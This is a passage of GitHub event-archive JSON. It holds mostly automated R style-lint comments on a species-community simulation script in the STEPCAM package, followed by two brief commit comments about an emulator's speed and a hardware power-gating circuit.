~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n[R/generateArtificialData.R:82:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L82) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(output)\n^\n```\n[R/generateArtificialData.R:83:16:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n              ~^~~\n```\n[R/generateArtificialData.R:83:32:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n                              ~^~\n```\n[R/generateArtificialData.R:83:61:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n"}},"created_at":"2016-09-20T10:31:46Z"}
{"id":"4588800262","type":"CommitCommentEvent","actor":{"login":"Fadi5555"},"repo":{"name":"frangarcj/pcsx_rearmed"},"payload":{"comment":{"id":19093978,"position":null,"line":null,"path":null,"commit_id":"9facb65b76d846175f3ef9fbeafd1c590a0e0630","created_at":"2016-09-20T10:32:32Z","updated_at":"2016-09-20T10:32:32Z","body":"You're always wecome. We really appreciate about your work.\r\nI have question please. If we could implement dynarec I mean pcsx_reARMed core on vita can. Can it run in fullspeed?"}},"created_at":"2016-09-20T10:32:32Z"}
{"id":"4588800534","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19093979,"position":null,"line":null,"path":null,"commit_id":"81b738f4ec9bc7abaeec10e25fb82b4721d19087","created_at":"2016-09-20T10:32:35Z","updated_at":"2016-09-20T10:32:35Z","body":"Hey! Don't you use a power gate in the STM/screen? I have a big transistor to power gate the whole thing but the ESP. Then I also have a big resistor on that transistor's gate to make sure it's always off unless the ESP really wants it to be ON. Any thoughts?"}},"created_at":"2016-09-20T10:32:35Z"}
